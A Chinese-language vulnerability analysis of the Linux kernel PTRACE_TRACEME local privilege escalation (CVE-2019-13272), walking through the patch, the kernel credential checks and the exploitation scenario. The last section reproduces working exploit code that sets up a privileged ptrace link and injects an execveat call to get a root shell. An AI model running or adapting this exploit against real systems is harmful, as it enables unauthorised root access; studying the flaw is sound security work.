PTRACE_TRACEME CVE-2019-13272 本地提權漏洞解析

摘要：第 4 步， task C 使用 PTRACE_TRACE 建立跟 B 的 trace link 時，由於 B 此時是 euid = 0 (因爲它剛剛執行了 suid binary), 所以 C 記錄的 ptracer_cred 的 euid 也是 0。Fix two issues: // 第一個問題，是 cred 的 rcu reference 問題 When called for PTRACE_TRACEME, ptrace_link() would obtain an RCU reference to the parent's objective credentials, then give that pointer to get_cred(). However, the object lifetime rules for things like struct cred do not permit unconditionally turning an RCU reference into a stable reference. // 第二個問題，tracee 記錄的 tracer 的 cred 的問題 PTRACE_TRACEME records the parent's credentials as if the parent was acting as the subject, but that's not the case. If a malicious unprivileged child uses PTRACE_TRACEME and the parent is privileged, and at a later point, the parent process becomes attacker-controlled (because it drops privileges and calls execve()), the attacker ends up with control over two processes with a privileged ptrace relationship, which can be abused to ptrace a suid binary and obtain root privileges. Fix both of these by always recording the credentials of the process that is requesting the creation of the ptrace relationship: current_cred() can't change under us, and current is the proper subject for access control.。

PTRACE_TRACEME 漏洞是 Jann Horn 201907 月發現的內核提權漏洞, 漏洞發現和利用的思路有很多值得學習的地方, 本文記錄了個人的學習過程

author: Gengjia Chen ( [email protected] ) of IceSwordLab, qihoo 360

漏洞補丁

我們從漏洞補丁 ptrace: Fix ->ptracer_cred handling for PTRACE_TRACEME 入手分析

Fix two issues:

// 第一個問題，是 cred 的 rcu reference 問題
When called for PTRACE_TRACEME, ptrace_link() would obtain an RCU   
reference to the parent's objective credentials, then give that pointer
to get_cred().  However, the object lifetime rules for things like
struct cred do not permit unconditionally turning an RCU reference into
a stable reference.

// 第二個問題，tracee 記錄的 tracer 的 cred 的問題
PTRACE_TRACEME records the parent's credentials as if the parent was 
acting as the subject, but that's not the case.  If a malicious
unprivileged child uses PTRACE_TRACEME and the parent is privileged, and
at a later point, the parent process becomes attacker-controlled
(because it drops privileges and calls execve()), the attacker ends up
with control over two processes with a privileged ptrace relationship,
which can be abused to ptrace a suid binary and obtain root privileges.


Fix both of these by always recording the credentials of the process
that is requesting the creation of the ptrace relationship:
current_cred() can't change under us, and current is the proper subject
for access control.

以上是補丁的描述，以下是補丁的代碼

diff --git a/kernel/ptrace.c b/kernel/ptrace.c
index 8456b6e..705887f 100644
--- a/kernel/ptrace.c
+++ b/kernel/ptrace.c
@@ -79,9 +79,7 @@ void __ptrace_link(struct task_struct *child, struct task_struct *new_parent,
  */
 static void ptrace_link(struct task_struct *child, struct task_struct *new_parent)
 {
-    rcu_read_lock();
-    __ptrace_link(child, new_parent, __task_cred(new_parent));
-    rcu_read_unlock();
+    __ptrace_link(child, new_parent, current_cred());
 }

從補丁的描述來看，一共修復了 2 個問題

1 是 rcu reference 的問題，對應的代碼是刪除了 rcu 鎖;
2 是 tracee 記錄 tracer 進程的 cred 引發的問題

本文不關心第一個問題，只分析可以用於本地提權的第二個問題

從補丁描述看第二個問題比較複雜，我們後面再分析，補丁對應的代碼倒是非常簡單，

將 ‘__task_cred(new_parent)’ 換成了 ‘current_cred()’, 也就是說記錄的 cred 從 tracer 進程的 cred 換成了當前進程的 cred

漏洞分析

ptrace 是一個系統調用，它提供了一種方法來讓進程 (tracer) 可以觀察和控制其它進程 (tracee) 的執行，檢查和改變其核心映像以及寄存器, 主要用來實現斷點調試和系統調用跟蹤

1    396  kernel/ptrace.c <<ptrace_attach>>
             ptrace_link(task, current);  // link 的雙方分別是要 trace 的目標進程 'task' 
                      //  和發動 trace 的當前進程 'current'
   2    469  kernel/ptrace.c <<ptrace_traceme>>
             ptrace_link(current, current->real_parent);  // link 的雙方分別是發動 trace 的
                              // 當前進程 ‘current’ 和當前進程的
                              // 父進程 ' current->real_parent'

trace 關係的建立有 2 種方式

1 是進程調用 fork 函數然後子進程主動調用 PTRACE_TRACEME, 這是由 tracee 發起的, 對應內核函數 ptrace_traceme
2 是進程調用 PTRACE_ATTACH 或者 PTRACE_SEIZE 去主動 trace 其他進程, 這是由 tracer 發起的, 對應內核函數 ptrace_attach

不管是哪種方式，最後都會調用 ptrace_link 函數去建立 tracer 和 tracee 之間的 trace 關係

ptrace_attach 關聯的雙方是 ‘task’ (tracee) 和 ‘current’ (tracer)
ptrace_traceme 關聯的雙方是 ‘current’ (tracee) 和 ‘current->real_parent’ (tracer)

這裏我們要仔細記住上面 2 種模式下 tracer 和 tracee 分別是什麼，因爲這就是漏洞的關鍵

static void ptrace_link(struct task_struct *child, struct task_struct *new_parent)
{
        rcu_read_lock();
        __ptrace_link(child, new_parent, __task_cred(new_parent));
        rcu_read_unlock();
}

void __ptrace_link(struct task_struct *child, struct task_struct *new_parent,
                   const struct cred *ptracer_cred)
{
        BUG_ON(!list_empty(&child->ptrace_entry));
        list_add(&child->ptrace_entry, &new_parent->ptraced); // 1. 將自己加入父進程的 ptraced 隊列
        child->parent = new_parent; // 2. 將父進程地址保存在 parent 指針
        child->ptracer_cred = get_cred(ptracer_cred); // 3. 保存 ptracer_cred, 我們只關注這個變量
}

建立 trace 關係的關鍵是由 tracee 記錄 tracer 的 cred, 保存在 tracee 的 ‘ptracer_cred’ 變量，這個變量名很顧名思義

ptracer_cred 這個概念是由 2016 年的一個補丁 ptrace: Capture the ptracer’s creds not PT_PTRACE_CAP 引入的, 引入 ptracer_cred 的目的是用於當 tracee 執行 exec 去加載 setuid executable 時做安全檢測

爲什麼需要這個安全檢測呢?

exec 函數族可以更新進程的鏡像, 如果被執行文件的 setuid 位置位，則運行這個可執行文件時，進程的 euid 會被修改成該可執行文件的所有者的 uid, 如果可執行文件的所有者權限比調用 exec 的進程高, 運行這類 setuid executable 會有提權的效果

假如執行 exec 的進程本身是一個 tracee, 當它執行了 setuid executable 提權之後，由於 tracer 可以隨時修改 tracee 的寄存器和內存，這時候低權限的 tracer 就可以控制 tracee 去執行越權操作

作爲內核，顯然是不允許這樣的越權行爲存在的，所以當 trace 關係建立時, tracee 需要保存 tracer 的 cred (即 ptracer_cred), 然後在執行 exec 過程中, 如果發現執行的可執行程序是 setuid 位置位的，則會判斷 ‘ptracer_cred’ 的權限，如果權限不滿足，將不會執行 setuid 位的提權，而是以原有的進程權限執行這個 setuid executable

這個過程的代碼分析如下(本文的代碼分析基於 v4.19-rc8)

do_execve
  -> __do_execve_file
  -> prepare_binprm 
      -> bprm_fill_uid
      -> security_bprm_set_creds
          ->cap_bprm_set_creds
          -> ptracer_capable
          ->selinux_bprm_set_creds
          ->(apparmor_bprm_set_creds)
          ->(smack_bprm_set_creds)
          ->(tomoyo_bprm_set_creds)

如上，execve 權限相關的操作主要在函數 ‘prepare_binprm’ 裏

1567 int prepare_binprm(struct linux_binprm *bprm)
    1568 {
    1569         int retval;
    1570         loff_t pos = 0;
    1571 
    1572         bprm_fill_uid(bprm); // <-- 初步填充新進程的 cred
    1573 
    1574         /* fill in binprm security blob */
    1575         retval = security_bprm_set_creds(bprm); // <-- 安全檢測，     
                             // 可能會修改新進程的 cred
    1576         if (retval)
    1577                 return retval;
    1578         bprm->called_set_creds = 1;
    1579 
    1580         memset(bprm->buf, 0, BINPRM_BUF_SIZE);
    1581         return kernel_read(bprm->file, bprm->buf, BINPRM_BUF_SIZE, &pos);
    1582 }

如上，先調用 ‘bprm_fill_uid’ 初步填充新進程的 cred, 再調用 ‘security_bprm_set_creds’ 做安全檢測並修改新的 cred

1509 static void bprm_fill_uid(struct linux_binprm *bprm)
    1510 {
    1511         struct inode *inode;
    1512         unsigned int mode;
    1513         kuid_t uid;
    1514         kgid_t gid;
    1515 
    1516         /*
    1517          * Since this can be called multiple times (via prepare_binprm),
    1518          * we must clear any previous work done when setting set[ug]id
    1519          * bits from any earlier bprm->file uses (for example when run
    1520          * first for a setuid script then again for its interpreter).
    1521          */
    1522         bprm->cred->euid = current_euid(); // <--- 先使用本進程的euid
    1523         bprm->cred->egid = current_egid();
    1524 
    1525         if (!mnt_may_suid(bprm->file->f_path.mnt))
    1526                 return;
    1527 
    1528         if (task_no_new_privs(current))
    1529                 return;
    1530 
    1531         inode = bprm->file->f_path.dentry->d_inode;
    1532         mode = READ_ONCE(inode->i_mode);
    1533         if (!(mode & (S_ISUID|S_ISGID))) // <---------- 如果可執行文件沒有 setuid/setgid 位，這裏就可以返回了
    1534                 return;
    1535 
    1536         /* Be careful if suid/sgid is set */
    1537         inode_lock(inode);
    1538 
    1539         /* reload atomically mode/uid/gid now that lock held */
    1540         mode = inode->i_mode;
    1541         uid = inode->i_uid; // <---- 如果文件 S_ISUID 置位，使用文件的 i_uid
    1542         gid = inode->i_gid;
    1543         inode_unlock(inode);
    1544 
    1545         /* We ignore suid/sgid if there are no mappings for them in the ns */
    1546         if (!kuid_has_mapping(bprm->cred->user_ns, uid) ||
    1547                  !kgid_has_mapping(bprm->cred->user_ns, gid))
    1548                 return;
    1549 
    1550         if (mode & S_ISUID) {
    1551                 bprm->per_clear |= PER_CLEAR_ON_SETID;
    1552                 bprm->cred->euid = uid; // <------ 使用文件的 i_uid 作爲新進程的 euid
    1553         }
    1554 
    1555         if ((mode & (S_ISGID | S_IXGRP)) == (S_ISGID | S_IXGRP)) {
    1556                 bprm->per_clear |= PER_CLEAR_ON_SETID;
    1557                 bprm->cred->egid = gid;
    1558         }
    1559 }

如上，主要看兩行

1522 行, 將當前的 euid 賦值新的 euid, 所以大部分執行了 execve 的進程的權限跟原來的一樣
1552 行，如果帶有 suid bit, 則將可執行文件的所有者的 uid 賦值新的 euid, 這就是所謂 setuid 的實現，新的 euid 變成了它執行的可執行文件所有者的 uid，如果所有者是特權用戶，這裏就實現了提權

但是，這裏的 euid 依然不是最終的結果，還需要進入函數 security_bprm_set_creds 做進一步的安全檢測

security_bprm_set_creds 函數調用的是 LSM 框架

在我分析的內核版本上, 實現 ‘bprm_set_creds’ 這個 hook 點安全檢測的 lsm 框架有 5 種, 檢測函數如下,

cap_bprm_set_creds
selinux_bprm_set_creds
apparmor_bprm_set_creds
smack_bprm_set_creds
tomoyo_bprm_set_creds

這裏哪些 hook 檢測函數會被執行，其實是跟具體的內核配置有關的, 理論上把所有 lsm 框架都啓用的話，上述所有這些實現了 ‘bprm_set_creds’ hook 檢測的函數都會被執行

在我的分析環境裏實際運行的檢測函數只有 cap_bprm_set_creds 和 selinux_bprm_set_creds 這倆

其中，對 euid 有影響的是 ‘cap_bprm_set_creds’ 這個函數

815 int cap_bprm_set_creds(struct linux_binprm *bprm)
    816 {
    817         const struct cred *old = current_cred();
    818         struct cred *new = bprm->cred;
    819         bool effective = false, has_fcap = false, is_setid;
    820         int ret;
    821         kuid_t root_uid;
    ===================== skip ======================
    838         /* Don't let someone trace a set[ug]id/setpcap binary with the revised
    839          * credentials unless they have the appropriate permit.
    840          *
    841          * In addition, if NO_NEW_PRIVS, then ensure we get no new privs.
    842          */
    843         is_setid = __is_setuid(new, old) || __is_setgid(new, old);  
    844 
    845         if ((is_setid || __cap_gained(permitted, new, old)) && // <---- 檢測是否執行的是 setid 程序
    846             ((bprm->unsafe & ~LSM_UNSAFE_PTRACE) || 
    847              !ptracer_capable(current, new->user_ns))) { // <----- 如果執行execve的進程被trace了，且執行的程序是 setuid 的，需要增加權限檢測
    848                 /* downgrade; they get no more than they had, and maybe less */
    849                 if (!ns_capable(new->user_ns, CAP_SETUID) ||
    850                     (bprm->unsafe & LSM_UNSAFE_NO_NEW_PRIVS)) {
    851                         new->euid = new->uid; // <----- 如果檢測不通過，會將新進程的 euid 重新設置爲原進程的 uid
    852                         new->egid = new->gid;
    853                 }
    854                 new->cap_permitted = cap_intersect(new->cap_permitted,
    855                                                    old->cap_permitted);
    856         }
    857 
    858         new->suid = new->fsuid = new->euid;
    859         new->sgid = new->fsgid = new->egid;
    ===================== skip ======================
}

如上

行 845, 檢測 euid 是否跟原有的 uid 不一致 (在函數 bprm_fill_uid 分析裏我們知道，如果執行的文件是 setuid bit 的， euid 就會不一致)
```
所以這裏等同於檢測執行的可執行程序是不是 setid 程序
```
行 847, 檢測本進程是否是 tracee

如果兩個條件同時滿足，需要執行 ptracer_capable 函數進行權限檢測，假設檢測不通過，會執行 downgrade 降權

行 851, 將 new->euid 的值重新變成 new->uid，就是說在函數 bprm_fill_uid 裏提的權在這裏可能又被降回去

499 bool ptracer_capable(struct task_struct *tsk, struct user_namespace *ns)
    500 {
    501         int ret = 0;  /* An absent tracer adds no restrictions */
    502         const struct cred *cred;
    503         rcu_read_lock();
    504         cred = rcu_dereference(tsk->ptracer_cred); // <----- 取出 ptrace_link 時保存的 ptracer_cred 
    505         if (cred)
    506                 ret = security_capable_noaudit(cred, ns, CAP_SYS_PTRACE); // <-------- 進入 lsm 框架進行安全檢測
    507         rcu_read_unlock();
    508         return (ret == 0);
    509 }

如上，

行 504, 取出 ‘tsk->ptracer_cred’
行 506, 進入 lsm 框架對 ‘tsk->ptracer_cred’ 進行檢測

到了這裏，這個漏洞涉及到的變量 ‘tsk->ptracer_cred’ 終於出現了，如前所述，這個變量是建立 trace 關係時， tracee 保存的 tracer 的 cred

當 tracee 隨後執行 execve 去執行 suid 可執行程序時，就會調用 ptracer_capable 這個函數，通過 lsm 裏的安全框架去判斷 ‘ptracer_cred’ 的權限

lsm 框架裏的 capable hook 檢測我們這裏不分析了，簡單來說，如果 tracer 本身是 root 權限，則這裏的檢測會通過，如果不是，就會返回失敗

根據前面的分析，如果 ptracer_capable 檢測失敗， new->euid 的權限會被降回去

舉個例子， A ptrace B , B execve 執行 ‘/usr/bin/passwd’, 根據上面代碼的分析，如果 A 是 root 權限，則 B 執行 passwd 時的 euid 是 root, 否則就還是原有的權限

kernel/ptrace.c <<ptrace_traceme>>
             ptrace_link(current, current->real_parent);  

static void ptrace_link(struct task_struct *child, struct task_struct *new_parent)
{
        rcu_read_lock();
        __ptrace_link(child, new_parent, __task_cred(new_parent));
        rcu_read_unlock();
}

回到漏洞代碼, 爲什麼 traceme 在建立 trace link 時記錄 parent 的 cred 是不對的呢? 明明這時候 parent 就是 tracer 啊?

我們用 Jann Horn 舉的例子來說明爲什麼 traceme 這種方式建立 trace link 時不能使用 tracer 的 cred

- 1, task A: fork()s a child, task B
 - 2, task B: fork()s a child, task C
 - 3, task B: execve(/some/special/suid/binary)
 - 4, task C: PTRACE_TRACEME (creates privileged ptrace relationship)
 - 5, task C: execve(/usr/bin/passwd)
 - 6, task B: drop privileges (setresuid(getuid(), getuid(), getuid()))
 - 7, task B: become dumpable again (e.g. execve(/some/other/binary))
 - 8, task A: PTRACE_ATTACH to task B
 - 9, task A: use ptrace to take control of task B
 - 10, task B: use ptrace to take control of task C

如上場景有 3 個進程 A, B, C

第 4 步， task C 使用 PTRACE_TRACE 建立跟 B 的 trace link 時，由於 B 此時是 euid = 0 (因爲它剛剛執行了 suid binary), 所以 C 記錄的 ptracer_cred 的 euid 也是 0
第 5 步， task C 隨後執行 execve(suid binary), 根據我們上面的分析，由於 C 的 ptracer_cred 是特權的，所以 ptracer_capable 函數檢測通過，所以執行完 execve 後， task C 的 euid 也提權成 0 , 注意此時 B 和 C 的 trace link 還是有效的
第 6 步， task B 執行 setresuid 將自己降權，這個降權的目的是爲了能讓 task A attach
第 8 步， task A 使用 PTRACE_ATTACH 建立跟 B 的 trace link, A 和 B 都是普通權限, 之後 A 可以控制 B 執行任何操作
第 9 步， task B 控制 task C 執行提權操作

前面 8 步，依據之前的代碼分析都是成立的，那麼第 9 步能不能成立呢?

執行第 9 步時， task B 本身是普通權限， task C 的 euid 是 root 權限， B 和 C 的 trace link 有效, 這種條件下 B 能不能發送 ptrace request 讓 C 執行各種操作，包括提權操作?

下面我們結合代碼分析這個問題

1111 SYSCALL_DEFINE4(ptrace, long, request, long, pid, unsigned long, addr,
    1112                 unsigned long, data)
    1113 {
    1114         struct task_struct *child;
    1115         long ret;
    1116 
    1117         if (request == PTRACE_TRACEME) {
    1118                 ret = ptrace_traceme(); // <----- 進入 traceme 分支
    1119                 if (!ret)
    1120                         arch_ptrace_attach(current);
    1121                 goto out;
    1122         }
    1123 
    1124         child = find_get_task_by_vpid(pid);
    1125         if (!child) {
    1126                 ret = -ESRCH;
    1127                 goto out;
    1128         }
    1129 
    1130         if (request == PTRACE_ATTACH || request == PTRACE_SEIZE) {
    1131                 ret = ptrace_attach(child, request, addr, data); // <------ 進入 attach 分支
    1132                 /*
    1133                  * Some architectures need to do book-keeping after
    1134                  * a ptrace attach.
    1135                  */
    1136                 if (!ret)
    1137                         arch_ptrace_attach(child);
    1138                 goto out_put_task_struct;
    1139         }
    1140 
    1141         ret = ptrace_check_attach(child, request == PTRACE_KILL ||
    1142                                   request == PTRACE_INTERRUPT);
    1143         if (ret < 0)
    1144                 goto out_put_task_struct;
    1145 
    1146         ret = arch_ptrace(child, request, addr, data); // <---- 其他 ptrace request 
    1147         if (ret || request != PTRACE_DETACH)
    1148                 ptrace_unfreeze_traced(child);
    1149 
    1150  out_put_task_struct:
    1151         put_task_struct(child);
    1152  out:
    1153         return ret;
    1154 }

如上，由於 task B 和 task C 此時已經存在 trace link，所以通過 B 向 C 可以直接發送 ptrace request，將進入函數 arch_ptrace

arch/x86/kernel/ptrace.c

arch_ptrace 
    -> ptrace_request 
        -> generic_ptrace_peekdata
           generic_ptrace_pokedata 
            -> ptrace_access_vm 
                -> ptracer_capable 

 kernel/ptrace.c
 884 int ptrace_request(struct task_struct *child, long request,
 885                    unsigned long addr, unsigned long data)
 886 {
 887         bool seized = child->ptrace & PT_SEIZED;
 888         int ret = -EIO;
 889         siginfo_t siginfo, *si;
 890         void __user *datavp = (void __user *) data;
 891         unsigned long __user *datalp = datavp;
 892         unsigned long flags;
 893 
 894         switch (request) {
 895         case PTRACE_PEEKTEXT:
 896         case PTRACE_PEEKDATA:
 897                 return generic_ptrace_peekdata(child, addr, data);
 898         case PTRACE_POKETEXT:
 899         case PTRACE_POKEDATA:
 900                 return generic_ptrace_pokedata(child, addr, data);
 901 
 =================== skip ================
 1105 }


 1156 int generic_ptrace_peekdata(struct task_struct *tsk, unsigned long addr,
 1157                             unsigned long data)
 1158 {
 1159         unsigned long tmp;
 1160         int copied;
 1161 
 1162         copied = ptrace_access_vm(tsk, addr, &tmp, sizeof(tmp), FOLL_FORCE); // <--- 調用 ptrace_access_vm
 1163         if (copied != sizeof(tmp))
 1164                 return -EIO;
 1165         return put_user(tmp, (unsigned long __user *)data);
 1166 }
 1167 
 1168 int generic_ptrace_pokedata(struct task_struct *tsk, unsigned long addr,
 1169                             unsigned long data)
 1170 {
 1171         int copied;
 1172 
 1173         copied = ptrace_access_vm(tsk, addr, &data, sizeof(data), // <---- 調用 ptrace_access_vm
 1174                         FOLL_FORCE | FOLL_WRITE);
 1175         return (copied == sizeof(data)) ? 0 : -EIO;
 1176 }

如上，當 tracer 想要控制 tracee 執行新的代碼邏輯時，需要發送 request 讀寫 tracee 的代碼區和內存區，對應的 request 是 PTRACE_PEEKTEXT / PTRACE_PEEKDATA / PTRACE_POKETEXT / PTRACE_POKEDATA

這幾種讀寫操作最終都是通過函數 ptrace_access_vm 實現的

kernel/ptrace.c
    38 int ptrace_access_vm(struct task_struct *tsk, unsigned long addr,
    39                      void *buf, int len, unsigned int gup_flags)
    40 {
    41         struct mm_struct *mm;
    42         int ret;
    43 
    44         mm = get_task_mm(tsk);
    45         if (!mm)
    46                 return 0;
    47 
    48         if (!tsk->ptrace ||
    49             (current != tsk->parent) ||
    50             ((get_dumpable(mm) != SUID_DUMP_USER) &&
    51              !ptracer_capable(tsk, mm->user_ns))) { // < ----- 又是調用 ptracer_capable 函數
    52                 mmput(mm);
    53                 return 0;
    54         }
    55 
    56         ret = __access_remote_vm(tsk, mm, addr, buf, len, gup_flags);
    57         mmput(mm);
    58 
    59         return ret;
    60 }

    kernel/capability.c
    499 bool ptracer_capable(struct task_struct *tsk, struct user_namespace *ns)
    500 {
    501         int ret = 0;  /* An absent tracer adds no restrictions */
    502         const struct cred *cred;
    503         rcu_read_lock();
    504         cred = rcu_dereference(tsk->ptracer_cred);
    505         if (cred)
    506                 ret = security_capable_noaudit(cred, ns, CAP_SYS_PTRACE);
    507         rcu_read_unlock();
    508         return (ret == 0);
    509 }

如上， ptrace_access_vm 函數會調用我們之前分析到的 ‘ptracer_capable’ 來決定這個 request 是否可以進行, 這是 ‘ptracer_capable’ 函數的第二種使用場景

根據之前我們分析的結果， task C 此時保存的 ptracer_cred 是特權 cred, 所以這時候 ptracer_capable 會通過，也就是說我們回答了剛剛的問題，這種情況下，普通權限的 task B 是可以發送 ptrace request 去讀寫 root 權限的 task C 的內存區和代碼區的

至此，task C 記錄的這個特權 ptracer_cred 實際上發揮了 2 種作用

1，可以讓 task C 執行 execve(suid binary) 給自己提權
2，可以讓普通權限的 task B 執行 ptrace 讀寫 task C 的代碼區和內存區，從而控制 task C 執行任意操作

上面 2 點合起來，不就是完整的提權操作嗎?

小結

我們仔細回顧上述代碼分析過程，才終於明白補丁描述寫的這段話

PTRACE_TRACEME records the parent's credentials as if the parent was 
acting as the subject, but that's not the case.  If a malicious
unprivileged child uses PTRACE_TRACEME and the parent is privileged, and
at a later point, the parent process becomes attacker-controlled
(because it drops privileges and calls execve()), the attacker ends up
with control over two processes with a privileged ptrace relationship,
which can be abused to ptrace a suid binary and obtain root privileges.

本質上這個漏洞有點像 TOCTOU 類漏洞, ptracer_cred 的獲取是在 traceme 階段, 而 ptracer_cred 的應用是在隨後的各種 request 階段，而在隨後的 ptrace request 的時候， tracer 的 cred 可能已經不是一開始建立 trace link 時的那個 cred 了

diff --git a/kernel/ptrace.c b/kernel/ptrace.c
index 8456b6e..705887f 100644
--- a/kernel/ptrace.c
+++ b/kernel/ptrace.c
@@ -79,9 +79,7 @@ void __ptrace_link(struct task_struct *child, struct task_struct *new_parent,
  */
 static void ptrace_link(struct task_struct *child, struct task_struct *new_parent)
 {
-    rcu_read_lock();
-    __ptrace_link(child, new_parent, __task_cred(new_parent));
-    rcu_read_unlock();
+    __ptrace_link(child, new_parent, current_cred());
 }

我們再次看看 jann horn 的補丁: ‘__task_cred(new_parent)’ -> ‘current_cred()’

補丁的意思是說在 PTRACE_TRACEME 這種場景下， ptracer_cred 記錄的不應該是父進程的 cred，而應該是自己的 cred

所以我覺得從這個變量的用途來說，它其實記錄的不是 tracer 的 cred, 而是 ‘trace link creater’ 的 cred

我建議 jann horn 將這個變量名改成 ptracelinkcreater_cred, 當 trace link 由 PTRACE_ATTACH 建立時，它等於 tracer 的 cred, 當 trace link 由 PTRACE_TRACEME 建立時，它等於 tracee 的 cred, 它實際上記錄的是 trace 關係建立者的權限 !

exploit

本漏洞利用的關鍵是找到合適的可執行程序啓動 task B, 這個可執行程序要滿足如下條件:

1, 必須是能被普通權限用戶調用
2, 執行時必須有提權到root的階段
3, 執行提權後必須執行降權

(短暫提權到 root 的目的是讓 task C 可以獲取 root 的 ptracer_cred, 再降權的目的是讓 B 能被普通權限的進程 ptrace attach)

這裏我列出 3 份 exploit 代碼:

jann horn 的 exploit 裏使用桌面發行版自帶的 pkexec 程序用於啓動 task B

pkexec 允許特權用戶以其他用戶權限執行另外一個可執行程序，用於 polkit 認證框架, 當使用 —user 參數時，剛好可以讓進程先提權到 root 然後再降權到指定用戶，因此可以用於構建進程 B, 此外需要找到通過 polkit 框架執行的可執行程序(jann horn 把他們成爲 helper)，這些 helper 程序需要滿足普通用戶用 pkexec 執行它們時不需要認證（很多通過 polkit 執行的程序都需要彈窗認證）, 執行的模式如下:

/usr/bin/pkexec —user nonrootuser /user/sbin/some-helper-binary

bcoles 的 exploit 在 jann horn 的基礎上增加了尋找更多 helper binary 的代碼，因爲 jann horn 的 helper 是一個寫死的程序，在很多發行版並不存在，所以他的 exploit 在很多發行版系統上無法運行， bcoles 的 exploit 可以在更多的發行版上運行成功

本人出於學習的目的，也寫了一份 jiayy 的 exploit , 因爲 helper binary 因不同發行版而異， pkexec 也是桌面發行版纔有，而事實上這個提權漏洞是 linux kernel 的漏洞，所以我把 jann horn 的 exploit 改成了使用一個 fakepkexec 程序來提權，而這個 fakepkexec 和 fakehelper 程序手動生成（而不是從目標系統搜索），這樣一來學習者可以在任何存在本漏洞的 linux 系統（不需要桌面）運行我的 exploit 進行研究

exploit 分析

下面簡單過一下 exploit 的代碼

167 int main(int argc, char **argv) {
168   if (strcmp(argv[0], "stage2") == 0)
169     return middle_stage2();
170   if (strcmp(argv[0], "stage3") == 0)
171     return spawn_shell();
172 
173   helper_path = "/tmp/fakehelper";
174 
175   /*
176    * set up a pipe such that the next write to it will block: packet mode,
177    * limited to one packet
178    */
179   SAFE(pipe2(block_pipe, O_CLOEXEC|O_DIRECT));
180   SAFE(fcntl(block_pipe[0], F_SETPIPE_SZ, 0x1000));
181   char dummy = 0;
182   SAFE(write(block_pipe[1], &dummy, 1));
183 
184   /* spawn pkexec in a child, and continue here once our child is in execve() */
185   static char middle_stack[1024*1024];
186   pid_t midpid = SAFE(clone(middle_main, middle_stack+sizeof(middle_stack),
187                             CLONE_VM|CLONE_VFORK|SIGCHLD, NULL));
188   if (!middle_success) return 1;
189 
======================= skip =======================
215 }

先看行 186, 調用 clone 生成子進程（也就是 task B）, task B 運行 middle_main

64 static int middle_main(void *dummy) {
 65   prctl(PR_SET_PDEATHSIG, SIGKILL);
 66   pid_t middle = getpid();
 67 
 68   self_fd = SAFE(open("/proc/self/exe", O_RDONLY));
 69 
 70   pid_t child = SAFE(fork());
 71   if (child == 0) {
 72     prctl(PR_SET_PDEATHSIG, SIGKILL);
 73 
 74     SAFE(dup2(self_fd, 42));
 75 
 76     /* spin until our parent becomes privileged (have to be fast here) */
 77     int proc_fd = SAFE(open(tprintf("/proc/%d/status", middle), O_RDONLY));
 78     char *needle = tprintf("nUid:t%dt0t", getuid());
 79     while (1) {
 80       char buf[1000];
 81       ssize_t buflen = SAFE(pread(proc_fd, buf, sizeof(buf)-1, 0));
 82       buf[buflen] = '';
 83       if (strstr(buf, needle)) break;
 84     }
 85 
 86     /*
 87      * this is where the bug is triggered.
 88      * while our parent is in the middle of pkexec, we force it to become our
 89      * tracer, with pkexec's creds as ptracer_cred.
 90      */
 91     SAFE(ptrace(PTRACE_TRACEME, 0, NULL, NULL));
 92 
 93     /*
 94      * now we execute passwd. because the ptrace relationship is considered to
 95      * be privileged, this is a proper suid execution despite the attached
 96      * tracer, not a degraded one.
 97      * at the end of execve(), this process receives a SIGTRAP from ptrace.
 98      */
 99     puts("executing passwd");
100     execl("/usr/bin/passwd", "passwd", NULL);
101     err(1, "execl passwd");
102   }
103 
104   SAFE(dup2(self_fd, 0));
105   SAFE(dup2(block_pipe[1], 1));
106 
107   struct passwd *pw = getpwuid(getuid());
108   if (pw == NULL) err(1, "getpwuid");
109 
110   middle_success = 1;
111   execl("/tmp/fakepkexec", "fakepkexec", "--user", pw->pw_name, NULL);
112   middle_success = 0;
113   err(1, "execl pkexec");
114 }

行 70, 調用 fork 生成孫進程（也就是 task C）

然後行 111, task B 運行 fakepkexec 讓自己提權再降權

然後看行 76 ~ 84, task C 檢測到 task B 的 euid 變成 0 之後，會執行行 91 進行 PTRACE_TRACEME 操作獲取 root 的 ptracer_cred, 然後緊接着 task C 馬上運行 execl 執行一個 suid binary 讓自己的 euid 變成 0

190   /*
191    * wait for our child to go through both execve() calls (first pkexec, then
192    * the executable permitted by polkit policy).
193    */
194   while (1) {
195     int fd = open(tprintf("/proc/%d/comm", midpid), O_RDONLY);
196     char buf[16];
197     int buflen = SAFE(read(fd, buf, sizeof(buf)-1));
198     buf[buflen] = '';
199     *strchrnul(buf, 'n') = '';
200     if (strncmp(buf, basename(helper_path), 15) == 0)
201       break;
202     usleep(100000);
203   }
204 
205   /*
206    * our child should have gone through both the privileged execve() and the
207    * following execve() here
208    */
209   SAFE(ptrace(PTRACE_ATTACH, midpid, 0, NULL));
210   SAFE(waitpid(midpid, &dummy_status, 0));
211   fputs("attached to midpidn", stderr);
212 
213   force_exec_and_wait(midpid, 0, "stage2");
214   return 0;

接下去回到 task A 的 main 函數，行 194 ~ 202, task A 檢測到 task B 的 binary comm 變成 helper 之後，

運行行 213 執行 force_exec_and_wait

116 static void force_exec_and_wait(pid_t pid, int exec_fd, char *arg0) {
117   struct user_regs_struct regs;
118   struct iovec iov = { .iov_base = &regs, .iov_len = sizeof(regs) };
119   SAFE(ptrace(PTRACE_SYSCALL, pid, 0, NULL));
120   SAFE(waitpid(pid, &dummy_status, 0));
121   SAFE(ptrace(PTRACE_GETREGSET, pid, NT_PRSTATUS, &iov));
122 
123   /* set up indirect arguments */
124   unsigned long scratch_area = (regs.rsp - 0x1000) & ~0xfffUL;
125   struct injected_page {
126     unsigned long argv[2];
127     unsigned long envv[1];
128     char arg0[8];
129     char path[1];
130   } ipage = {
131     .argv = { scratch_area + offsetof(struct injected_page, arg0) }
132   };
133   strcpy(ipage.arg0, arg0);
134   for (int i = 0; i < sizeof(ipage)/sizeof(long); i++) {
135     unsigned long pdata = ((unsigned long *)&ipage)[i];
136     SAFE(ptrace(PTRACE_POKETEXT, pid, scratch_area + i * sizeof(long),
137                 (void*)pdata));
138   }
139 
140   /* execveat(exec_fd, path, argv, envv, flags) */
141   regs.orig_rax = __NR_execveat;
142   regs.rdi = exec_fd;
143   regs.rsi = scratch_area + offsetof(struct injected_page, path);
144   regs.rdx = scratch_area + offsetof(struct injected_page, argv);
145   regs.r10 = scratch_area + offsetof(struct injected_page, envv);
146   regs.r8 = AT_EMPTY_PATH;
147 
148   SAFE(ptrace(PTRACE_SETREGSET, pid, NT_PRSTATUS, &iov));
149   SAFE(ptrace(PTRACE_DETACH, pid, 0, NULL));
150   SAFE(waitpid(pid, &dummy_status, 0));
151 }

